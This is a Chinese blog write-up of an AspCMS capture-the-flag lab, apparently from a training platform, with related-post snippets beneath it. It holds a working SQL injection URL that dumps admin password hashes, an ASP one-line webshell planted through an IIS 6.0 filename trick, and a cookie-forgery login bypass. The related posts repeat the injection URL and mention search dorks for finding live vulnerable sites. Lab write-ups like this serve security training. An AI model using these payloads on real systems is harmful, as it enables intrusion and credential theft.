墨者学院—CMS系统漏洞分析溯源(第4题)—两种解法

最新推荐文章于 2026-05-06 09:28:51 发布
原创 最新推荐文章于 2026-05-06 09:28:51 发布 · 1.1k 阅读 · 1 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#信息安全
本文介绍了一种通过文件解析漏洞在CMS后台植入木马的方法,包括利用注入漏洞获取后台密码、登录后台及利用IIS6.0解析漏洞插入木马等步骤。

一.解题思路

登录后台利用文件解析漏洞插入一句话木马

二.操作步骤

解法一

1.利用注入漏洞,获取后台密码
构造语句

http://ip:port/plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user

在这里插入图片描述

得到后台密码:121b28fa741f0976
经过MD5解密后:4rfv3edc2wsx1qaz
在这里插入图片描述

默认用户名:admin
密码:4rfv3edc2wsx1qaz

2.登录后台
默认用户名:admin
密码:4rfv3edc2wsx1qaz
在这里插入图片描述

浏览网址发现在界面风格——编辑模块/CSS文件中的文件可以任意修改和添加文件
在这里插入图片描述

3.插入木马
点击添加模板
该CMS正好存在IIS6.0解析漏洞
构造文件名为:hack.asp;.html
文件信息为:<%eval request (“pass”)%>
在这里插入图片描述

4.连接蚁剑
在这里插入图片描述
可以在文件根目录下看到密钥信息
在这里插入图片描述

解法二

1.打开cookie manger
利用 cookie manger伪造cookie,登录后台

添加下列字段
groupMenu=all
adminrand=1
adminName=admin’ or ‘1’=’1
在这里插入图片描述

2.查询http://ip:port/admin,就可以直接进入后台
在这里插入图片描述

3.获取key值
后面操作与解法一相同

漏洞解析

参考文章: https://blog.csdn.net/u014549283/article/details/81810940

在文件inc—AspCms_CommonFun.asp中的1086-1124行可以看到源码中存在相应问题
在这里插入图片描述在这里插入图片描述

在1088行alertMsgAndGo"您还没有登陆","/" ——证明adminname不能为空
在1093行alertMsgAndGo"您没有访问权限","-1" ——证明groupMenu需要等于all
在1121行alertMsgAndGo"您没有访问权限","-1" ——证明adminrand值需要为一个数字,SQL语句必须成立且返回数字为1时才具有访问权限

网络信息安全——ploto

学院-CMS系统漏洞分析溯源(4)
JimWu的博客
09-04 954
CMS系统漏洞分析溯源(4) 难易程度:★★★ 目类型:身份认证和会话管理 使用工具:FireFox浏览器、wwwscan、菜刀 1.打开靶场,用wwwscan扫一下。 发现后台/admin/home.asp 2.访问后台http://219.153.49.228:49339/admin/home.asp,显示还没有登陆。 3.使用cookie-editor,伪造cookie,添加use...
学院_CMS系统漏洞分析溯源(4)
weixin_50698958的博客
10-10 999
靶场: https://www.mozhe.cn/bug/detail/VFRndDEyR1JXVUFySmxzWk14NTRjUT09bW96aGUmozhe 背景介绍 ASPCMS是完全开源的一套CMS建站系统,主要面向企业进行快速的建造简洁,高效,易用,安全的公司企业网站,一般的开发人员就能够使用本系统以最低的成本、最少的人力投入在最短的时间内架设一个功能齐全、性能优异的公司企业网站。ASPCMS是基于ASP+Access(sql2000)开发的网站内容管理系统。 实训目标 1.学习登录绕过
CVE-2026-29014深度剖析:MetInfo CMS未授权RCE漏洞与2026年企业建站安全新挑战
最新发布
从零开始,掌握网络安全。提供全面的网络安全教程、攻防演练技巧和行业动态。
05-06 515
2026年4月1日,安全研究员Egidio Romano公开披露了MetInfo CMS的一个严重安全漏洞,编号为,CVSS v3.1评分高达9.8分(严重),CVSS v2评分更是达到了满分10分。这是2026年以来第一个被大规模利用的企业级CMS漏洞,其危害程度堪比2024年的Log4j2和2025年的WordPress WPForms漏洞。该漏洞存在于MetInfo CMS 7.9、8.0和8.1三个版本中,是一个无需身份验证的PHP代码注入漏洞。
学院 - CMS系统漏洞分析溯源(4)
多崎巡礼的博客
10-09 1164
使用火狐插件cookie-editor 新增一个cookie value如下 username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG; LanguageAlias=cn; LanguagePath=%2F; languageID=1; adminId=1; adminName=admin; groupMenu=1%2C+70...
360众测靶场库之32-CMS系统漏洞分析溯源(4)
zjl12344的博客
03-08 299
360众测靶场
CMS系统漏洞分析溯源(4)
zr1213159840的博客
01-28 1272
打开给的链接的页面,能发现是aspcms,还给了一个登录框 通过搜索发现,aspcms存在一个注入漏洞,拿到登录名和密码 http://219.153.49.228:45597//plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user 对密码进行一
学院CMS系统漏洞分析溯源(第2)—3种解法详细介绍
ploto_cs的博客
10-13 1050
解法一 解方法: 使用一句话木马进行连接 操作步骤: 1.对网址进行探测 2.发现后台版本文件robots.txt 发现CMS为 PHPCMS v9 后台登录页面为 admin.php 3.浏览 自动填入密码 浏览源码可以发现密码为:I@vH@U$9n8* 也可以将源码中密码的字段名由password改为text 4.查看是否与学院-CMS系统漏洞分析溯源(第7)存在相同的文件上传漏洞 原文回顾:https://blog.csdn.net/ploto_cs/article/details/
者 - CMS系统漏洞分析溯源(4)
吃肉唐僧的博客
07-19 1158
用御剑扫描后台 当访问admin/home.asp时候,提示还没登录 上网搜索aspcms的漏洞 参考;https://www.webshell.cc/2944.html 用 cookie manger伪造cookie cookies:username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG; LanguageA...
0day漏洞(aspcms)漏洞实战
weixin_49071539的博客
12-16 3849
1. 谷歌搜索关键字 Powered by aspcms.com Copyright ?2010-2011 intitle:Powered by AspCms2 2. 接着利用注入漏洞 /plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user 3.
aspcms逻辑错误导致后台地址泄露
weixin_30835933的博客
11-22 2372
访问即可跳转后台地址: URL:http://www.xxx.org.cn/plug/oem/AspCms_OEMFun.asp 注入:plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%2...
2019强网杯“随便注“
热门推荐
stybill的博客
10-14 5万+
目 解思路 探测有无注入 1' 报错 1'# 正常且为True 1' and 1=1# 正常且为True 1' and 1=2# 正常且为False 可以得知存在注入,并且参数使用单引号闭合。 获取列数 1' order by 1# 1' order by 2# 1' order by 3# 报错 可以得知,列数为2 尝试获取数据库名、用户基本信息等 1.使用联合注入查询: -1' union se/**/lect null, user()# 报错: return preg.
【漏洞复现】AspCMS commentList.asp SQL注入
失心少年
09-14 2421
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!AspCMS commentList.asp 存在SQL注入漏洞,攻击者通过漏洞可以获取管理员md5的密码,进行解密后登录获取敏感数据。1.利用如下POC可获取管理员MD5的密码。
渗透(龙帝)
weixin_30651273的博客
08-11 359
一、Powered by aspcms.com Copyright ?2010-2011 步奏1. 首先谷歌关键字 Powered by aspcms.com Copyright ?2010-2011 步奏2. 可以看到有许多站 随便进去一个 接着利用注入漏洞 /plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect...
【WEB】aspcms漏洞利用
HAPPY
08-18 1万+
【社工方法】(不推荐) 1.首先谷歌关键字 Powered by aspcms.com Copyright ?2010-2011 的漏洞,果然功夫不负有心人 2.接着利用注入漏洞 /plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password...
cms 修改mysql密码忘记_aspcms忘记登陆密码 修改后台密码
weixin_39971132的博客
01-19 395
1、创建asp文件粘贴代码,上传更目录,执行.dim action : action=getForm("action","get")if action="pass" then editPassSub editPassdim GroupID,PassWord,rePasswordGroupID=getForm("GroupID","post")PassWord=getForm("PassWord",...
某考试系统逻辑漏洞打包#可改改分数#查看大量信息
weixin_30374009的博客
03-18 570
转载请注明作者admin-神风 漏洞一、登录处可遍历uid密码爆破 http://www.examcoo.com/passport/login/preurl/L3VzZXJjZW50ZXIv 登录之前注册好了的账号2246055 然后抓包 看到数据包中的pwd是加密的 随后去md5解密 可以看到密码是123456 然后遍历uid来爆破那些用户是123456这个密码的 ...
超级签名cms后台管理系统添加开发者账号流程
qq_23215571的博客
09-01 1722
打开已经部署成功的cms链接,拥有管理员权限的用户可以进入开发者账号添加界面,如图 点击添加, 1. 首先填写需要添加的开发者账号。 2. 制作csr证书 使用MAC电脑打开钥匙串 点击继续生成CertificateSigningRequest.certSigningRequest文件,找到该文件右击选择打开方式文本编辑,全选复制粘贴到csr。 ...
注入id列表_开源CMS实战渗透测试ASPCMS注入
weixin_39926613的博客
11-27 1147
实验等级:中级任务场景:【任务场景】小王在对ASPCMS进行代码审计时,发现ASPCMS的API存在较大的安全问。在查阅资料后,发现该CMS的逻辑漏洞会导致SQL语句执行漏洞。任务分析:【任务分析】通过阅读源码,找到commentList.asp中的逻辑漏洞。使用处理过的SQL语句执行获取管理员信息,并对其密码进行MD5解密,最终实现盗取管理员账号密码的效果。预备知识:【预备知识】A...
者 - CMS系统漏洞分析溯源(第5)
吃肉唐僧的博客
07-19 1047
御剑一顿乱扫 挖到后台登录地址 卡住了,不知如何入手 后来看到别人的解思路,别人是直接下载了该网站的源码分析, 参考链接:https://www.yuag.org/2016/08/23/phpecms1-3-cookies%E6%AC%BA%E9%AA%97%E6%BC%8F%E6%B4%9E%E8%BF%9B%E5%90%8E%E5%8F%B0/ phpecms1.3/admi...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值